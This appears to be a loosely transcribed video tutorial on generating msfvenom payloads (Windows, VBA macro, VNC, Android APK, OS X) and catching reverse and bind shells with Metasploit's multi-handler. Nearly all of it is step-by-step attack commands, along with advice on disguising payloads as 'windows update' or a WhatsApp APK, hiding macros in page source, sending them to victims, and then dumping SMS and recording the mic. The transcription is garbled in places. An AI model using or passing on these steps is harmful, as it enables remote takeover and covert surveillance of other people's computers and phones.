Hello guys, welcome back to Pen Testers Club. Today we are going to discuss about Msfvenom tutorial for beginners. So let's get started. So today we will learn to create a payloads from a popular tool well known as a Metasploit. We will explore the various options available within the tool to create a payloads with the different extensions and techniques. Okay, so first of all, we want to discuss what is Msfvenom. So Msfvenom is a command line instance of Metasploit that is used to generate an output of all various types of shell codes that are available in Metasploit. So what we are required now? So we require a Kali Linux as well as Windows machine, Android phone, uh, as well as Linux machine. So first of all, we gather all those things in a line. So you require Kali Linux, Windows, Mac OS, Android, Linux, or etc. machines. You just keep it connected through in your network. That's it. So now what we need to do here? So first of all, let's begin here. Just open a terminal. So you can type msfvenom help. So you got it the help here. Msfvenom is a Metasploit standalone payload generator. So now you can see like here payload list and format encoder arch output bad character no payloads space iterations add code templates keep where name timeout help and many things. So first of all we just clear this. So we need to create a bind shell first of all. So what is a bind shell? A bind shell is a kind that open a new service on the target machine and requires an attacker to connect to it in order to get a session. Now type a command here. So first of all we want to type msfvenom minus p defines the payload. Okay, so mine is Windows and you can type meter operator. So I go I go for bind TCP. So I'm binding the TCP minus F as exe. Then I go for industry cloud. Sorry, I want to go home downloads bind.exe. So let's wait. So now I got bind.exe so that I can look it out here. cd downloads. Now type a list here bind.exe. You can watch this the payload how they was written. Type here. This is the payload which they was written the bind.exe. Okay, so I just type it clear here. So we have created the bind.exe. So now what we need to type msf console. So now we need to put like here use exploit multi handler. So we need to set the payload. Set payload Windows interpreter reverse underscore, sorry, I want to type a bind TCP. So we have set. So we need to type set rhost rhost. So I want to see my IP address. So I type ifconfig. So this is my IP address 68.43.55, 192.168.43.65. So I need to set a L port. Yes, I said 344. So and I can do the exploit. So it's starting a TCP handler against. So first of all, what we need to do here? So come here. Uh, when you are successfully created a payload, so now you can type cd downloads, type a list. First of all, you type sudo su, then type password. Now you can type make directory where www.html share. So it was created a directory. So you need to type copy from the this destination location. So you can type home so now you can see the file is available or not there. You can type cd where www.html share, type a list. So now you have seen the bind.exe. So what we need to type now, service apache 2, sorry, notice. So I am starting the service to Apache. So once I have Apache 2 service started, so now I come back here. Now I can type http 192.168.43.65 65 /share. So you can see here bind.exe. So I download this payload and I can install. Okay, if I not install, I can bind the cryptor, I can send it to the victim, and I can replace, I can put the logo for that, I can send it to the client victim. That's it. You get the control access from here in meter session from here. Okay, so you can type sessions minus I1. Do not get because I not yet installed because of the security purpose. Okay, so we go for same thing. So I just exit from here. Similarly, uh, same thing. Now what we need to do for this is for buying for reversion for Linux. So I can do for now as a Windows because you get a confused. I just clear from here also, and I can clear. So now I want to do for Windows. Msfvenom -p Windows interpreter reverse underscore TCP. You need to type lhost equal to 192.168.43.65. You need to type lport equal to 555 minus FEXE. You need to type a greater than, then you can type home So I create a window update.exe as a payload. So let's see. So final payload created is done here. So now you can see cd downloads, type in this. This I have Windows update windows.exe. So now what we need to do as similar as same thing. Now you can go msf console. So I need to type use exploit multi handler. Now I can type set payload. So you need to set the payload is same as it is from here. Okay, copy from here and paste it here. So now I can type set lhost is whatever you have given is lhost here 192.168.43.65. Again you type set lport 5555. Then you can type exploit or run, anything can work. So once it started here, same as similar as these things. Okay, so now I can we type here exit. Okay, now I can type sudo su. Now I just copy this same thing from here, paste it. So I want to change the name only here from the downloads to what is the name I was created here, win update. So once it's came, so you just type enter. So it was copied. So now you can come back here, you can refresh it, you can see the Windows update. Now you can download this one and you can run the payload. So you get here meetup session and you can exploit and dump the data. You can see the VNC sessions and everything. So now we see the reverse HTTPS payload. So how this reverse HTTPS payload can work? So now we can create a reverse HTTPS payload. So we can type Msfvenom, same as it is, but here we need to change a something here. We need to change reverse in TCP place as HTTP. So we need to change TCP place as HTTPS, port name as lport is, you can give accordingly to your wish. I'm choosing this, and change the payload name. So I created HTTPS. Otherwise I can give like 443. .exe. So now you can see the payload is created. Now I can type msf console. Use exploit multi-handler. You need to type a set payload. So what is your payload? So this is your payload. Now we are trying HTTPS payload. So copy from here, you can paste it. Otherwise you can type it yourself. So you need to type set lhost. Lhost is 192.168.43.65. Now I can type set lport equal to A16. So that's it. You can try to exploit now. So once you get an exploit here, now we go to same as it is from here, copy, paste it, but we need to change here only the payload name 443. That's it, we have copied. Now we can see here we got the payload here. Payload, we got it. We need to run this payload because I use a Mac OS, but I can't able to run this until I install the Wine software. Okay, so I'm not gonna run this in my system. Okay, so now I come back. So that's it, HTTPS payload. So now we can try hidden uh, bind TCP payloads. So how we can try this hidden bind TCP payloads? So we just clear this. So Msfvenom -p, type for Windows, shell hidden bind TCP. So I gonna use here like a host, not using a L host. Let me show that further. 68.43.65. L port equal to 777 minus F. I want to get it with an exe. So I just created here. Now let's see. Once payload is created, we go further. So once the payload is generated, send the victim an execution. We will start our next step. So we want to send this payload as a this payload to a reverse shell. Okay. So how we need to see this? So I just type here clear everything. So now you can see. So NC means netcat listener. Okay. we need to type 192.168.43.65 and port is 777. So connection is refused. Why? So netcat 192.168.43.65. So connection is refused. So you need to send to the client first of all this bind same as it is. So now I can clear this. Now we can see the reverse shell payload. This is the same similar as like this. So now you can type. We try to use a macro payload. Now let's see how this will work. So Msfvenom minus P Windows interpreter reverse export. TCP lhost equal to 192.168.43.65. Lport. So airport you can give like 311 minus F VBA. So let's see it can generate a macro payload or not. Yeah, this is a macro payload. So you need to copy all those things above all those things. Come here. So from here to you need to copy the macro payload and write in like a hidden white page source, and you can send it to your client, and you can put a netcat listener and you can listen this. Okay, it's simply like you send a photo or you return hidden in the photo background as a white space or something else this payload, and you can listen the sessions and you can hack their phone because they automatically they download and see the photos or videos in many things. So okay, so this is done. So now we want to look like a VNC payload. So how we want to try a VNC payload? So now you can type Msfvenom minus P Windows VNC inject reverse underscore TCP lhost see. So I just create like home industry club, go for downloads, vnc.exe. So VNC is like same like a virtual RDP. You can control the virtual RDP, but it looks like a blurry in the Metasploit. So invalid payload. So let's see. So now it's created a VNC payload. Now you can see CD downloads. So we are in the downloads. So this is a VNC payload. So now we can launch MSF console. So now we need to type set a payload. No. Before we need to type use exploit multi handler. Sorry. So now we need to type set payload Windows VNC inject reverse TCP. Now we need to type set lhost equal to 192.168.43.65. Then you can type set L port equal to, what is the L port we was given here? The L port is 2222. So you need to look it here carefully and you can send it the L port. So click on exploit. So once the exploit is came here, you not yet get it here since you need to push this file to some other in the Apache server. cd list sudo su, then type password. You need to type copy home dot downloads. You need to type vnc.exe. So we have here. So now you got it here, vnc.exe. Once you have downloaded this one, you will get automatically from here. Client sessions, you can type here, like once you get the sessions minus I1, then you can type run VNC server. You get the virtual like a RDP session here. What the client can do, you can see this, all those things. So now once we come back to an Android payload, so we can see same as it is. Here we go for we only need to change here. Here is Android meter operator reverse underscore TCP. I can use only a 222. So in the Android, you need to make it as APK. So in the APK, you need to type WhatsApp APK. That's it. So I try to run in the my Android. Let's see. Error, the format of the value is like Android. So framework format and value is error. So let's see. Uh, we will clear everything here. You can type Msfvenom -p Android meter operator reverse underscore TCP lhost equal to 192.168.43.65 lport equal to 443. So we don't need to give anything else from there. You can type home, just downloads. I just type only file.apk. Let's see if this file is done. Yeah, now file is created. So now what I need to do is I type NSF console. The files is already there. Now what I want to do is, so simply come back here, type a list whatsapp.exe. I type a remove whatsapp.exe, so it was removed. File.apk, copy. Yeah, so I need to do copy the whole thing, come back here, file to apk. I sent to file to apk over there. Now what I need to do is I need to do here use exploit multi handler. Now what I need to do, set payload Android, so meter operator reverse underscore TCP. Now I can type set lhost equal to 192.168.43. So here is the wrong 43.65. Now I can type set lport. Lport what I was given here as an same lport is 443. I need to give 443. Now I can look show options where everything is set. Now I can type exploit. So exploit is done. So I just try to install the file.apk in my Android phone. So I can execute, but you won't see here anything screen here. So now you can see sending stage to 192.168.43.1. So it was installed. Now we got a meterpreter sessions. So now what we need to type is sys info. No, I type sys info. So you got it here, localhost, Android, Linux, Arch, and everything. So you can type a help. You got it help here. You can find many things. Record a mic, webcam chat, webcam list, screen share, everything. Whatever we have done previous things. Once a client is executed, you can do everything from here like this. Same thing. Okay. Uh, Dump SMS. So I can see this. I can dump SMS. Android operations is fail one. So you can type LAN geo locate. So it's required for API key to locate a geolocation. So we can do a record the mic also, many things we can do from here. Starting standard API webcam audio record operation is fail. So that's it, you can do it your own self guys once you get the sessions is activated, meterpreter sessions. So you can type exit. So you can also exit from here. Now we got it here. So now most advancedly wanted, how to hack iPhones or Mac OS. So first of all, what we need to do here, so we need to try as same thing. So you can type Msfvenom, Msfvenom minus p. So p defines a payload. So once again guys, OS means Mac OS. So I try with OS X, that's better. OS X x64 bit operation and meter printer reverse underscore TCP. You need to type L port same as your IP address 192.168.43.65. No, sorry here. L host and L port equal to 445. So I use 445 here. Minus F. I want in the Mac OS as a DMG as a payload. Now I can type home. We need to give our destination location where the payload need to save. I use iPhone 15 as DMG. Let's see if this payload is generated. We can go further. So it's a wrong. So you can see here, this. Remove IP 15.dmg. Okay. So now we can start from here beginning. So we type a clear all these things. So now we go for this work. So now I can type Msfvenom minus p osx x64 meter crater reverse underscore TCP and we need to define lhost equal to 192.168.43.65 lport equal to 123. So I just defined like it 123 minus f is like macro. So I try to define because I use a Mac OS. So I think I would like to give a macro and minus O defines the output of the payload is what I want to give is just plug downloads payload.bin. Let's see if this generated a payload or not. Yeah, it successfully generated a payload. Now I can see no encoder specified and everything. So I directly start MSF console from here. So I want to come here, type a list payload.bin. Okay, now you can see this. So I want to remove from here. Yes, type payload.bin. So I remove this and I run. Copy. Why it's not allowed? We type exit. We type a cd where www.html share title list not come cd downloads no cd we type cd downloads title list and type sudo su type alex. Now we type alex. Yes, now I can give password. Yeah, now so now you can type a copy. Just type a list, type a copy home industry log downloads payload.bin where www.html is share. So the payload is done there. So now come back to Metasploit framework. So you need to type here simple as same as it is, use exploit multi handler. Now you can type set payload. So I don't want to type as it is. Set a payload So what is the payload? Our payload is OSX. This is our payload. So I just copy and paste it. So set lhost. Lhost is IP address is this one. So just copy, paste it, and I set lport is 123. Now I can type exploit. So the exploit is done. So now you come back here. Now you can see we have created 6 to 7 payloads. Now where is a payload.bin? This is a payload.bin. Yeah. Payload.bin cannot be opened because this is an undefined developer. macOS can't verify this app free from the malware. The application cannot be opened -128. Now let's see. We not yet get this one. So it was vulnerable only below as a who is using macOS 10, 10 or 10.5. That type of only that macOS is vulnerable. That's it, guys. Metasploit for beginners, how to do the work. Thank you guys for watching. Have a nice day.